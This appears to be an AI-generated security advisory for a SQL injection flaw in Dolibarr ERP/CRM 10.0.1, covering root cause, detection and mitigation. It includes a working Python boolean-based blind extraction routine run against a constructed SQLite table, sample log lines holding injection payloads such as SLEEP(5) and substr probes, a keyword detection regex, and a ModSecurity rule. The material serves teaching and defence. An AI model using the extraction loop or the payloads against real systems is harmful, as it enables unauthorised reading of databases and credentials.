CVE-2019-25450 Overview
CVE-2019-25450 is a SQL injection vulnerability in Dolibarr ERP/CRM version 10.0.1. Several POST parameters handled by the application's card.php endpoints, including actioncode, demand_reason_id and availability_id, are incorporated into SQL queries without proper neutralization. An authenticated attacker can therefore alter those queries and extract database contents using boolean-based blind, error-based and time-based blind techniques.
Critical Impact
Authenticated attackers can read arbitrary data from the Dolibarr database, exposing confidential business data, customer records, financial information and user credentials stored by the ERP/CRM system. Because the queries run under the application's own database account, the data an attacker can reach is bounded by that account's privileges, not by the attacker's permissions inside Dolibarr.
Affected Products
- Dolibarr ERP/CRM version 10.0.1
- The card.php endpoints that accept the actioncode, demand_reason_id and availability_id POST parameters
Discovery Timeline
- 2026-02-22 - CVE-2019-25450 published to NVD
- 2026-02-25 - Last updated in NVD database
Technical Details for CVE-2019-25450
Vulnerability Analysis
This vulnerability stems from insufficient validation of user-supplied POST parameters in Dolibarr ERP/CRM. The affected card.php endpoints neither enforce the expected type of the input (the parameters named in the advisory are identifiers or codes, so an integer or a short fixed-alphabet string would be expected) nor bind it as a query parameter; the raw value is built into the SQL string, which is the condition that makes injection possible.
The vulnerability can be exploited through multiple injection techniques:
- Boolean-based blind SQL injection: Attackers can infer database content by observing differences in application responses based on true/false conditions injected into queries.
- Error-based SQL injection: By crafting payloads that trigger database errors, attackers can extract data through error messages returned by the application.
- Time-based blind SQL injection: Attackers can use database delay functions to infer information based on response timing differences.
Exploitation requires authentication, so the attacker needs valid credentials for an account that can reach the vulnerable endpoints. That is a weak barrier in practice: Dolibarr connects to its database with a single configured account, so even a low-privileged user with access to the affected forms can read across the whole schema, not only the records that user is allowed to see in the interface.
Root Cause
The root cause is CWE-89 (Improper Neutralization of Special Elements used in an SQL Command). The application builds SQL statements by directly concatenating the user-controlled POST parameters (actioncode, demand_reason_id, availability_id) into the query text, without type enforcement, escaping, or parameterized queries/prepared statements.
Attack Vector
The attack is network-based, requiring the attacker to send specially crafted HTTP POST requests to the vulnerable card.php endpoints. The attacker must first authenticate to the Dolibarr application with valid credentials. Once authenticated, the attacker can inject SQL payloads through the vulnerable POST parameters to manipulate database queries and extract sensitive information.
The exploitation process involves:
- Authentication to the Dolibarr ERP/CRM application
- Identification of vulnerable card.php endpoints
- Injection of SQL payloads through POST parameters such as actioncode, demand_reason_id, or availability_id
- Extraction of database information using blind or error-based techniques
For technical details and proof-of-concept information, see the Exploit-DB #47370 advisory.
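The root-cause pattern and the boolean-based blind technique from the exploitation steps above, as an added example that is not Dolibarr's code and not the Exploit-DB proof of concept: a lookup that concatenates a POST parameter into SQL, an extraction loop that recovers a string through it one character at a time using only a "did a record render or not" signal, and the hardened form that enforces the type and binds the value. The table and column names, the in-memory SQLite backend (standing in for the MySQL/MariaDB or PostgreSQL database Dolibarr normally uses) and the payload shapes are constructed for the example; the SQLite functions `length`, `substr` and `unicode` are used because SQLite has no `SLEEP()` or verbose error channel, so only the boolean-based variant is shown.

```python
"""SQL injection root cause: concatenated query vs. parameterized query, with a
boolean-based blind extraction loop driven through the vulnerable one."""
import re
import sqlite3

# Constructed schema and rows. Table and column names are assumptions for the
# example, not Dolibarr's real schema; SQLite stands in for MySQL/MariaDB.
SCHEMA = """
CREATE TABLE availability (rowid INTEGER PRIMARY KEY, code TEXT, label TEXT);
CREATE TABLE app_user (rowid INTEGER PRIMARY KEY, login TEXT, pass_crypted TEXT);
INSERT INTO availability VALUES (1, 'AV_NOW', 'Immediate'), (2, 'AV_1M', 'One month');
INSERT INTO app_user VALUES (1, 'admin', '$2y$10$constructed-hash-for-example');
"""


def connect():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def lookup_vulnerable(db, availability_id):
    """CWE-89 pattern: the POST parameter is concatenated straight into SQL."""
    sql = "SELECT label FROM availability WHERE rowid = " + availability_id
    return [row[0] for row in db.execute(sql)]


def lookup_hardened(db, availability_id):
    """Fix: enforce the expected type first, then bind the value as a parameter."""
    if not re.fullmatch(r"[0-9]{1,10}", availability_id):
        raise ValueError("availability_id must be a positive integer")
    rows = db.execute(
        "SELECT label FROM availability WHERE rowid = ?", (int(availability_id),)
    )
    return [row[0] for row in rows]


def hardened_rejects(db, value):
    """True when the hardened lookup refuses the value before it reaches SQL."""
    try:
        lookup_hardened(db, value)
        return False
    except ValueError:
        return True


class BlindExtractor:
    """Boolean-based blind extraction: the only signal available is whether
    the page rendered a record (the query returned rows) or not."""

    def __init__(self, oracle):
        self.oracle = oracle  # oracle(param_value) -> True when rows came back
        self.requests = 0

    def ask(self, condition):
        self.requests += 1
        # rowid = 1 is a real record, so the response flips only on <condition>.
        return self.oracle(f"1 AND ({condition})")

    def bsearch(self, expr, low, high):
        """Binary search for the integer value of a SQL expression in [low, high]."""
        while low < high:
            mid = (low + high) // 2
            if self.ask(f"{expr} > {mid}"):
                low = mid + 1
            else:
                high = mid
        return low

    def extract(self, subquery, max_len=64):
        """Recover the single string returned by `subquery`, one character per search."""
        length = self.bsearch(f"length(({subquery}))", 0, max_len)
        return "".join(
            chr(self.bsearch(f"unicode(substr(({subquery}), {i}, 1))", 32, 126))
            for i in range(1, length + 1)
        )


def make_oracle(db):
    # Stands in for "send the POST, check whether the record rendered".
    return lambda value: len(lookup_vulnerable(db, value)) > 0


if __name__ == "__main__":
    db = connect()
    print(lookup_vulnerable(db, "1 OR 1=1"))  # every row comes back
    ex = BlindExtractor(make_oracle(db))
    print(ex.extract("SELECT login FROM app_user WHERE rowid = 1"), "in", ex.requests, "requests")
    print("hardened rejects tautology:", hardened_rejects(db, "1 OR 1=1"))
```

The request count printed by the loop is the quantity a defender should notice: recovering a short string takes dozens of near-identical POSTs to the same form from one session, differing only in one parameter value, which is the traffic shape the detection section below looks for. The hardened lookup fails closed on anything that is not a bare integer; the type check alone would stop this injection, and the bound parameter keeps it stopped if the check is ever loosened.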
Detection Methods for CVE-2019-25450
Indicators of Compromise
- Unusual SQL syntax or special characters in HTTP POST request parameters targeting card.php endpoints
- Database error messages appearing in application logs or responses
- Abnormal database query patterns or slow queries, for example repeated SLEEP() or BENCHMARK() calls on MySQL/MariaDB, indicative of time-based injection attempts
- Unexpected data access patterns from authenticated user accounts
Detection Strategies
- Monitor web application firewall (WAF) logs for SQL injection signatures in POST parameters
- Implement database activity monitoring to detect unusual query patterns or unauthorized data access
- Review application logs for repeated requests to card.php with varying parameter values
- Configure intrusion detection systems (IDS) to alert on SQL injection attack patterns
Monitoring Recommendations
- Enable detailed logging for all requests to card.php endpoints
- Implement database audit logging to track query execution and data access
- Set up alerting for database errors that may indicate injection attempts
- Monitor authenticated user sessions for suspicious activity patterns
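A detection pass over request logs, as an added example rather than a tool shipped with Dolibarr or named on this page. It implements three of the strategies above: SQL syntax in POST parameters sent to card.php, one account sending many requests whose values for a single parameter change rapidly (the shape of blind extraction), and server errors or slow responses on those requests. The JSON-lines log format, the `/app/card.php` path, the user names and the thresholds are constructed for the example; a standard web-server access log does not contain POST bodies, so in practice the parameter values would have to come from a ModSecurity audit log or from application-level request logging.

```python
"""Offline hunt for SQL injection attempts against card.php in request logs."""
import json
import re
from collections import defaultdict

# Constructed sample log: one JSON object per request with decoded POST
# parameters. The path and users are made up; only card.php and the three
# parameter names come from the advisory.
SAMPLE_LOG = """
{"ts": 1700000000, "user": "alice", "method": "POST", "path": "/app/card.php", "params": {"actioncode": "AC_TEL", "demand_reason_id": "3"}, "status": 200, "ms": 45}
{"ts": 1700000001, "user": "alice", "method": "POST", "path": "/app/card.php", "params": {"actioncode": "AC_RDV", "demand_reason_id": "3"}, "status": 200, "ms": 40}
{"ts": 1700000100, "user": "bob", "method": "POST", "path": "/app/card.php", "params": {"availability_id": "1 AND 1=1"}, "status": 200, "ms": 50}
{"ts": 1700000101, "user": "bob", "method": "POST", "path": "/app/card.php", "params": {"availability_id": "1 AND 1=2"}, "status": 200, "ms": 48}
{"ts": 1700000102, "user": "bob", "method": "POST", "path": "/app/card.php", "params": {"availability_id": "1 AND (SELECT unicode(substr(login,1,1)) FROM app_user LIMIT 1)>96"}, "status": 200, "ms": 51}
{"ts": 1700000103, "user": "bob", "method": "POST", "path": "/app/card.php", "params": {"availability_id": "1'"}, "status": 500, "ms": 30}
{"ts": 1700000104, "user": "bob", "method": "POST", "path": "/app/card.php", "params": {"availability_id": "1 AND SLEEP(5)"}, "status": 200, "ms": 5040}
{"ts": 1700000105, "user": "bob", "method": "POST", "path": "/app/card.php", "params": {"availability_id": "1 AND (SELECT unicode(substr(login,1,1)) FROM app_user LIMIT 1)>112"}, "status": 200, "ms": 49}
{"ts": 1700000200, "user": "carol", "method": "GET", "path": "/app/card.php", "params": {"id": "5"}, "status": 200, "ms": 20}
"""

# Coarse SQL-syntax heuristic; tune per deployment (free-text fields will hit it).
SQLI_PATTERN = re.compile(
    r"'|--|/\*|\b(?:OR|AND|UNION|SELECT|SLEEP|BENCHMARK|EXTRACTVALUE|UPDATEXML)\b",
    re.IGNORECASE,
)


def parse(lines):
    for line in lines:
        line = line.strip()
        if line:
            yield json.loads(line)


def analyze(lines, window_s=60, churn_threshold=5, slow_ms=2000):
    """Return a list of findings ({'rule', 'user', 'detail'}) over the log lines."""
    findings = []
    history = defaultdict(list)  # (user, path, param) -> [(ts, value)]
    for rec in parse(lines):
        if rec["method"] != "POST" or not rec["path"].endswith("card.php"):
            continue
        for name, value in rec["params"].items():
            history[(rec["user"], rec["path"], name)].append((rec["ts"], value))
            if SQLI_PATTERN.search(value):
                findings.append({"rule": "sqli_pattern", "user": rec["user"],
                                 "detail": f"{name}={value!r}"})
        if rec["status"] >= 500:
            findings.append({"rule": "server_error", "user": rec["user"],
                             "detail": f"{rec['path']} -> {rec['status']}"})
        if rec["ms"] >= slow_ms:
            findings.append({"rule": "slow_response", "user": rec["user"],
                             "detail": f"{rec['ms']} ms on {rec['path']}"})
    # Churn: one account cycling many distinct values for one parameter in a
    # short window is what blind extraction looks like regardless of payload.
    for (user, path, name), events in history.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            distinct = {v for ts, v in events[i:] if ts - start <= window_s}
            if len(distinct) >= churn_threshold:
                findings.append({"rule": "param_churn", "user": user,
                                 "detail": f"{len(distinct)} distinct {name} values in {window_s}s"})
                break
    return findings


def summarize(findings):
    """Count findings per rule, for a quick triage view."""
    counts = {}
    for f in findings:
        counts[f["rule"]] = counts.get(f["rule"], 0) + 1
    return counts


if __name__ == "__main__":
    results = analyze(SAMPLE_LOG.splitlines())
    for f in results:
        print(f["rule"], f["user"], f["detail"])
    print(summarize(results))
```

The pattern rule alone is noisy on a CRM, where notes and descriptions legitimately contain quotes and the word "and"; the churn rule is the one worth alerting on, because a human filling in a form does not submit six different availability_id values in six seconds. A slow response or a 500 from the same session in that window raises the confidence further and separates time-based and error-based attempts from ordinary load problems.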
How to Mitigate CVE-2019-25450
Immediate Actions Required
- Upgrade Dolibarr ERP/CRM to the latest stable version that addresses this vulnerability
- If you maintain a fork or custom modules that build SQL from request parameters, enforce the expected type of each parameter and use parameterized queries; the core fix comes through upgrading
- Deploy a web application firewall (WAF) with SQL injection protection rules
- Review and restrict database user privileges to limit potential impact
- Audit user accounts with access to the affected functionality
Patch Information
Organizations should upgrade to a patched version of Dolibarr ERP/CRM. Refer to the VulnCheck Advisory for specific remediation guidance and patch information.
Workarounds
- Restrict network access to the Dolibarr application to trusted IP addresses only
- Implement additional authentication controls such as multi-factor authentication
- Use a web application firewall to filter malicious SQL injection payloads
- Restrict access to the affected card.php endpoints to the users who need them; disabling them outright is rarely practical, since card.php is the record form for the corresponding module, so treat this as a short-term measure until the upgrade is applied
# Example WAF rule to block SQL injection attempts (ModSecurity).
# @detectSQLi is backed by libinjection, so the ModSecurity build must include it.
# phase:2 is required here: POST parameters only become visible in ARGS once the
# request body has been parsed. Expect some false positives on free-text fields
# (notes, descriptions) and handle them with targeted exceptions, not by
# disabling the rule.
SecRule ARGS "@detectSQLi" \
    "id:1001,\
    phase:2,\
    block,\
    msg:'SQL Injection Attack Detected',\
    logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\
    severity:'CRITICAL'"
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.